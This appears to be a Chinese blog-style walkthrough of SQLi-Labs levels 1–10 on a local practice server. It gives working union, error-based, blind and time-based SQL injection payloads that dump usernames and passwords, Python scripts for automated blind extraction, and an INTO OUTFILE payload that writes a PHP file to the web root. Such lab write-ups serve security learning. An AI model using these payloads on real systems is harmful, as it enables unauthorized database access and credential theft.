sql靶场(1-10)
第一关(字符型注入)
判断注入是否存在
bash
http://127.0.0.1/sqllabs/Less-1/?id=1
data:image/s3,"s3://crabby-images/2af0d/2af0d8e99246d84347d385093c945b88725fc185" alt=""
判断sql语句是否拼接
bash
http://127.0.0.1/sqllabs/Less-1/?id=1'
http://127.0.0.1/sqllabs/Less-1/?id=1'--+
data:image/s3,"s3://crabby-images/18287/18287101a0205870d36e28bb315ffbae61b61c3c" alt=""
data:image/s3,"s3://crabby-images/8edcb/8edcb976bfd094e86f5e3588c6fdae09e00c08d5" alt=""
可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。
联合注入
爆列
首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)
bash
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 5--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 4--+
data:image/s3,"s3://crabby-images/9f819/9f81920e5d201e2a65759385ab6eaabb7ddbcdeb" alt=""
data:image/s3,"s3://crabby-images/ee476/ee4766bf3e04d77c706482c93261ef6a9c155da5" alt=""
data:image/s3,"s3://crabby-images/deb14/deb14538e38b6786e69b17a8c8e83844f1371967" alt=""
爆显示位
由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位
bash
http://127.0.0.1/sqllabs/Less-1/?id=1' union select 1,2,3--+
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,3--+
data:image/s3,"s3://crabby-images/9e39f/9e39f87a13c52017206144e5291628c1e23b0a29" alt=""
由于只能查看第一组数据,所以我们需要修改id值,让他要么远超这个数据表,要不小于0
data:image/s3,"s3://crabby-images/bde02/bde023486535267676d8c755887ad8cf3c5faf04" alt=""
爆数据库名和版本号
我们知道了回显的列数是第二列和第三列,所以我们可以直接爆出数据库名和版本号
bash
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/61e7e/61e7ec562cb4be860d63f1eec0f2fb0cae78935e" alt=""
爆表
bash
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
information_schema.tables表示该数据库下的tables表,group_concat() 是将查询结果连接起来,如果不用group_concat()查询到的结果只有user。
data:image/s3,"s3://crabby-images/ac90f/ac90f8ed4d2d13f477da15f5ea9e1887d7b864b7" alt=""
爆字段名
我们通过sql语句查询后的结果知道当前数据库有四个表,根据表名猜测账户和密码可能在users表中
bash
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。
data:image/s3,"s3://crabby-images/0515d/0515d2888ec34a2d05c7a149fa633e780ce2c9a4" alt=""
由查询到的结果,猜测username和password是账户名和密码
获取用户名和密码
bash
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(username ,0x3a , password) from users--+
data:image/s3,"s3://crabby-images/79668/79668364fa2e2c3c03e09f35f3996be55b04dfbf" alt=""
第二关(数字型注入)
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-2/?id=1
data:image/s3,"s3://crabby-images/796e0/796e0758186e0142bf34e8ba19c4d09af1bb9b93" alt=""
判断sql语句是否为拼接
bash
http://127.0.0.1/sqllabs/Less-2/?id=1'
http://127.0.0.1/sqllabs/Less-2/?id=1'--+
http://127.0.0.1/sqllabs/Less-2/?id=1
http://127.0.0.1/sqllabs/Less-2/?id=1--+
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉
data:image/s3,"s3://crabby-images/2234b/2234bdf86370ae689608e2f5d9046d25691c3b2c" alt=""
data:image/s3,"s3://crabby-images/5b1f5/5b1f5280999b47eafac27db64b65f4b00fecd363" alt=""
联合注入
爆列(和第一关一样的思想)
bash
http://127.0.0.1/sqllabs/Less-2/?id=1 order by 5--+
http://127.0.0.1/sqllabs/Less-2/?id=1 order by 3--+
http://127.0.0.1/sqllabs/Less-2/?id=1 order by 4--+
data:image/s3,"s3://crabby-images/053d5/053d52322985f060c5b906949d213e6b1c93af66" alt=""
爆显示位
bash
http://127.0.0.1/sqllabs/Less-2/?id=1 union select 1,2,3--+
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,3--+
data:image/s3,"s3://crabby-images/ccd31/ccd31c114dc7764c0f39222de139435066d0f9ef" alt=""
爆数据库名和版本号
bash
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/27a10/27a1003755ebe5760a0ec8105d6e6c0868e6e914" alt=""
爆表
bash
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
data:image/s3,"s3://crabby-images/cb7a9/cb7a935ee59167ba1e9c7e774ec2b2e16d458b4a" alt=""
爆字段名
bash
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
data:image/s3,"s3://crabby-images/6abf6/6abf6f123e56cd95e4c4a5978b511ef77772a6e2" alt=""
获取用户名和密码
bash
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(username ,0x3a , password) from users--+
data:image/s3,"s3://crabby-images/6d811/6d811138051d6425228439736a606446b6fba25a" alt=""
第三关
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-3/?id=1
data:image/s3,"s3://crabby-images/a7104/a7104f194de5096f98f1334b24f45a441c4cc8ce" alt=""
判断sql语句是否为拼接
bash
http://127.0.0.1/sqllabs/Less-3/?id=1'
http://127.0.0.1/sqllabs/Less-3/?id=1'--+
http://127.0.0.1/sqllabs/Less-3/?id=1')
http://127.0.0.1/sqllabs/Less-3/?id=1')--+
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select ... from ... where id=( '1') ...,在第一题中id=1'的后面单引号加上),其它保持不变就行了。
data:image/s3,"s3://crabby-images/d1d97/d1d97e8b71ed61533cd282db14e77c970fa3b5f8" alt=""
联合注入
爆列
bash
http://127.0.0.1/sqllabs/Less-3/?id=1') order by 5--+
http://127.0.0.1/sqllabs/Less-3/?id=1') order by 3--+
http://127.0.0.1/sqllabs/Less-3/?id=1') order by 4--+
data:image/s3,"s3://crabby-images/ac802/ac8022ad8bbdd1e675fb7602827763b0947a0782" alt=""
爆显示位
bash
http://127.0.0.1/sqllabs/Less-3/?id=1') union select 1,2,3--+
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,3--+
data:image/s3,"s3://crabby-images/e1ae2/e1ae27cf0bd5986e75f10e23dd3cc4f2c3d85b56" alt=""
爆数据库名和版本号
bash
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/5e0a1/5e0a1d6ae2fe815025361df8bc6368203bdfd0f6" alt=""
爆表
bash
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
data:image/s3,"s3://crabby-images/848d8/848d8969b799b0e1c701ecab76994521a5fec6eb" alt=""
爆字段名
bash
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
data:image/s3,"s3://crabby-images/cd1eb/cd1eb96d84ecadbcb5fe4e01d5bfac076f173e05" alt=""
获取用户名和密码
bash
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(username ,0x3a , password) from users--+
data:image/s3,"s3://crabby-images/e359b/e359b8baf42d7799a15762211fdf49b6c6cf751e" alt=""
第四关
判断是都存在注入
bash
http://127.0.0.1/sqllabs/Less-4/?id=1
data:image/s3,"s3://crabby-images/480c5/480c56445e7862c9039f9f233eee1b5fae0e0b4a" alt=""
判断sql语句是否为拼接
bash
http://127.0.0.1/sqllabs/Less-4/?id=1'
http://127.0.0.1/sqllabs/Less-4/?id=1'--+
http://127.0.0.1/sqllabs/Less-4/?id=1"
http://127.0.0.1/sqllabs/Less-4/?id=1"--+
http://127.0.0.1/sqllabs/Less-4/?id=1")
http://127.0.0.1/sqllabs/Less-4/?id=1")--+
输入单引号,页面无任何变化,输入双引号,页面报错,根据报错信息判断出咱们输入的内容被放到一队双引号和圆括号中,猜想一下:select ... from ... where id=("1") ...,把第一题中1后面的引号换成双引号加)就可以了。
data:image/s3,"s3://crabby-images/d0648/d06481fdc207deb15293fc6b11faf43883785bb1" alt=""
联合注入
爆列
bash
http://127.0.0.1/sqllabs/Less-4/?id=1") order by 5--+
http://127.0.0.1/sqllabs/Less-4/?id=1") order by 3--+
http://127.0.0.1/sqllabs/Less-4/?id=1") order by 4--+
data:image/s3,"s3://crabby-images/2da22/2da22022b490e8b2d8be03dd15a501a3dd8a9a92" alt=""
爆显示位
bash
http://127.0.0.1/sqllabs/Less-4/?id=-1") union select 1,2,3--+
data:image/s3,"s3://crabby-images/ccc6d/ccc6d19071492b9db53df799508f8d054be4f1ca" alt=""
爆数据库名和版本号
bash
http://127.0.0.1/sqllabs/Less-4/?id=-1") union select 1,database(),version()--+
data:image/s3,"s3://crabby-images/95bbe/95bbe431008b4ebbc41e23f3aee6cef3c9c4eee0" alt=""
爆表
bash
http://127.0.0.1/sqllabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
data:image/s3,"s3://crabby-images/2611c/2611c48c3c409dcb2a74e5373a7dddf96aaa8e81" alt=""
爆字段名
bash
http://127.0.0.1/sqllabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users'--+
data:image/s3,"s3://crabby-images/651ce/651ce12140fe5dd3ddc72e9f5bf7f4b4eb2aa1cd" alt=""
获取用户名和密码
bash
http://127.0.0.1/sqllabs/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+
data:image/s3,"s3://crabby-images/56884/568845d891878df6cbc44d7448643db2fb49cc86" alt=""
第五关(报错注入)
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-5/?id=1
判断sql语句是否为拼接
bash
http://127.0.0.1/sqllabs/Less-5/?id=1'
http://127.0.0.1/sqllabs/Less-5/?id=1'--+
data:image/s3,"s3://crabby-images/2a50b/2a50bf71aa93b6b78c564222eaf51d72571b2533" alt=""
但是无论我们输入什么命令都是没有回显,很明显的一件事就是这一关对于请求对错出现不一样,可以说是压根不报。这个时候我们用联合注入就没有用,因为联合注入是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择布尔盲注,报错注入。布尔盲注主要用length(),ascii() ,substr()这三个函数,但是我这一关不打算用布尔盲注。报错注入主要使用updatexml()、extractvalue()、floor()三个函数。
报错注入
updatexml()
爆数据库名和版本号
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select database()),'~'),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select version()),'~'),1)--+
data:image/s3,"s3://crabby-images/32c15/32c156bfd64404ec8e01b548c69f21b76e9e6380" alt=""
data:image/s3,"s3://crabby-images/1e02e/1e02e47216ceea18e2174b1494e78e24ec9b2680" alt=""
爆表
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
data:image/s3,"s3://crabby-images/dc2a8/dc2a82711ce85aa3a088c33a1931da92e527d9b6" alt=""
爆字段名
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)--+
data:image/s3,"s3://crabby-images/099bf/099bf31aafe0e09a5c05a6a2ee390f7562dd0f47" alt=""
获取用户名和密码
由于updatexml()函数最大容纳32字节,就会导致数据不完整,所以我们使用limit()函数进行分段截取,limit()函数使用方法是limit(*,1)*是从0开始的数字。自己爆完整的用户名和密码,我这里只试了前两个。
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--+
data:image/s3,"s3://crabby-images/26478/26478392d66d920c0f973e4bbbfa92f8493cd5c5" alt=""
data:image/s3,"s3://crabby-images/70795/707952a6e8b3db1e85f91327fc781a935ddc2947" alt=""
extractvalue()
代码我放这里了,有兴趣的朋友可以自己了解extractvalue()。自己爆完整的用户名和密码,我这里只试了前两个。
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select version()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e))--+
floor()
代码我放这里了,有兴趣的朋友可以自己了解floor()。自己爆完整的用户名和密码,我这里只试了前两个。
bash
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第六关
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-6/?id=1
判断sql语句是否拼接
bash
http://127.0.0.1/sqllabs/Less-6/?id=1'
http://127.0.0.1/sqllabs/Less-6/?id=1"
http://127.0.0.1/sqllabs/Less-6/?id=1"--+
通过测试,发现这一关是双引号闭合,但是无论我们输入什么命令都是没有回显,很明显的一件事就是这一关和第五关一样。这个时候我们用联合注入就没有用,因为联合注入是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择布尔盲注,报错注入。布尔盲注主要用length(),ascii() ,substr()这三个函数,但是我这一关不打算用布尔盲注。报错注入主要使用updatexml()、extractvalue()、floor()三个函数。
报错注入
由于和第五关的类型一样,这里我就只放了代码
updatexml()
bash
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat('~',(select database()),'~'),1)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat('~',(select version()),'~'),1)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--+
extractvalue()
bash
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select version()),0x7e))--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e))--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e))--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e))--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e))--+
floor()
bash
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-6/?id=1" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第七关
查看页面
data:image/s3,"s3://crabby-images/c4b00/c4b00da35add947f690b071e42d63c735bb90599" alt=""
有这个页面可以看出来这关应该是mysql的outfile漏洞利用,也就是mysql如何上传webshell,但是这个在实战中一般利用不到,因为要用这个漏洞必须要满足三个条件
1.mysql用户权限必须为root权限(但是你都有root权限了,还需要用这个漏洞吗)
2.secure_file-priv 必须为空值(在这个靶场环境中可以为靶场物理路径)(不是null)
3.知道网站的物理路径
所以在实战中一般用不到这个漏洞,但是我们现在在打靶场,所以还是攻克这一关吧,
由于是靶场环境,所以我用的就是root权限
data:image/s3,"s3://crabby-images/ed9df/ed9df0e3908964aa2c175432d20eaab837568738" alt=""
修改secure_flie_priv(在mysql的my.ini文件中修改)
data:image/s3,"s3://crabby-images/332a6/332a6a9ac345c7f158576c20776c7808c0664398" alt=""
自己增加这个参数
data:image/s3,"s3://crabby-images/10e1f/10e1f01196d7f59343bb85fac97282527f45a143" alt=""
查看
data:image/s3,"s3://crabby-images/686d8/686d80a20de8d6e726a77d8b621590c4e0511db7" alt=""
因为是自己打靶场,所以靶场物理路径我是知道的,这样有助于使用outfile上传webshell。
这三个条件现在都满足了,所以开始攻克第七关
bash
http://127.0.0.1/sqllabs/less-7/?id=-1%27))%20union%20select%201,user(),%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22F:\\phpstudy_pro\\WWW\\sqllabs\\webshell.php%22--+
data:image/s3,"s3://crabby-images/0ac71/0ac714f70d284fd2161bf130d1e9d359a45a140f" alt=""
很明显,我们上传webshell成功了,(我在这里没写一句话木马,主要是没必要)
data:image/s3,"s3://crabby-images/01fe4/01fe4635e68a3e0824b5f9794062685463b8e5e1" alt=""
第八关(布尔盲注)
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-8/?id=1
判断sql语句是否拼接
bash
http://127.0.0.1/sqllabs/Less-8/?id=1'--+
这一关联合查询和报错注入都不回显了,对的会显示You are in...........,错误啥都不会显示。我们看到这个情况就能猜想到这两种情况和布尔类型是一样的,所以我们可以使用布尔盲注。但是由于布尔盲注使用了length(),ascii() ,substr()这三个函数,由于这种情况会使手工注入变得十分繁琐,我们使用python编写脚本,依次进行遍历,就会比手工注入快速多了。
这一关使用python脚本进行遍历也有两种方法,一种是依次遍历,另一种是使用二分法快速遍历,这里我推荐和使用的是二分法,这样可以减少好多算力。
代码
爆数据库名
python
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 20):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(database(),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/3c43a/3c43acdd9a2185648a9a41503dfefd8adfa3331f" alt=""
爆表
python
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 32):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(table_name)from information_schema.tables where table_schema='security')),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/b50bf/b50bf5b21aa01fa407e4767f099b99bb38293e30" alt=""
爆字段名
python
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 32):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users')),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/323e7/323e7b8a283312f05a47265bf423d0fbe804ee55" alt=""
获取用户名和密码
python
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 1000):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(username ,0x3a , password) from users)),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/f8ca0/f8ca044dfc03b55973c898adb13045dd1f6ad975" alt=""
第九关(时间盲注)
判断是否存在注入
bash
http://127.0.0.1/sqllabs/Less-9/?id=1
判断sql语句是否拼接
bash
http://127.0.0.1/sqllabs/Less-9/?id=1'--+
这一关输入的sql语句无论对错,都只会显示You are in...........,因此,我们判断这一关需要时间盲注来进行闯关,同理我在这里会用python脚本来快速获取想要的东西。
代码
爆数据库
python
import requests
import time
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "?id=1' and if(ascii(substr(database(),%d,1))>%d, sleep(1), 0)--+" % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-9/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/e1315/e13158bb597d30c20f4d459b7bf06c127ba42bfe" alt=""
爆表
python
import requests
import time
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'security'), %d, 1)) > %d, sleep(3), 0)--+" % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-9/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/c8a01/c8a011fca016df48d063d8429ad412265a4d09b3" alt=""
爆字段名
python
import requests
import time
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), %d, 1)) > %d, sleep(3), 0)--+" % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-9/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/33899/3389995413ee63c4130b532cd4f88907e83f2a57" alt=""
获取用户名和密码
python
import requests
import time
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "?id=1' and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(3), 0)--+" % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-9/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/0e3ee/0e3ee30b5cd2d1e609f4d1b6b5bc9af6fff31728" alt=""
第十关
查看源代码后,发现第十关和第九关只是闭合方式不同
data:image/s3,"s3://crabby-images/83afb/83afb8735736057d7321307ebdea12ffc4ebf153" alt=""
所以我就直接把脚本和结果发出来啦,有兴趣的可以查看源代码
python
import requests
import time
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# low = 32
# high = 128
# mid = (low + high) // 2
# while low < high:
# payload = '?id=1" and if(ascii(substr(database(),%d,1))>%d, sleep(1), 0)--+' % (i, mid)
# start_time = time.time()
# r = requests.get(url + payload)
# end_time = time.time()
# if end_time - start_time >= 1:
# low = mid + 1
# else:
# high = mid
# mid = (low + high) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# low = 32
# high = 128
# mid = (low + high) // 2
# while low < high:
# payload = '?id=1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = "security"), %d, 1)) > %d, sleep(3), 0)--+' % (i, mid)
# start_time = time.time()
# r = requests.get(url + payload)
# end_time = time.time()
# if end_time - start_time >= 1:
# low = mid + 1
# else:
# high = mid
# mid = (low + high) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# low = 32
# high = 128
# mid = (low + high) // 2
# while low < high:
# payload = '?id=1" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users"), %d, 1)) > %d, sleep(3), 0)--+' % (i, mid)
# start_time = time.time()
# r = requests.get(url + payload)
# end_time = time.time()
# if end_time - start_time >= 1:
# low = mid + 1
# else:
# high = mid
# mid = (low + high) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = '?id=1" and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(1), 0)--+' % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-10/'
inject_database(url)
结果
data:image/s3,"s3://crabby-images/a8f34/a8f34e58d8e301386cfa4f66332b78a9a102485c" alt=""
总结
以上是sql靶场的一个小阶段,做完后可以尝试去解读靶场源代码,源代码也挺有意思的,后续还会继续更新sql靶场注入的。